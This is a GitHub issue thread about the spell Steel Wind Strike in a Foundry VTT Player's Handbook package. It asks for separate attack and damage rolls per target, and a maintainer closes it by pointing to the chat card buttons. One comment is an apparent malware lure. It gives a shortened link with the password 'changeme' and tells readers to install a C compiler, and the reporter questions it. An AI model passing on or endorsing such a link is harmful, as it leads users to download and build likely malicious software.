### ISSUE TITLE
[Bug]: Spell Steel Wind Strike should prompt for individual rolls against monsters instead of batching one roll vs selected monsters

### ISSUE THREAD

**Issue by thystra** [foundryvtt/foundryvtt-premium-content#785]
### What happened?

Spell Steel Wind Strike should prompt for individual rolls against monsters instead of batching one roll vs selected monsters. Spell should also do individual damage rolls against the up to five selected monsters. 

![image](https://github.com/user-attachments/assets/9cd16b28-097e-40d2-960a-411c680cb97d)

### What package are you reporting this for?

Dungeons & Dragons Player's Handbook

### Version

1.2.0

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by thystra** [comment]
What is that link?

> I think this will help you. https://bit.ly/47P0Nvo
> 
> Password: changeme If you don't have the c compliator, install it.(gcc or clang)

**Comment by mattexdee** [comment]
You can roll the attack and damage multiple times by pressing the `Attack` and `Damage` buttons on the spell's chat card. As a result I'll be closing this issue.
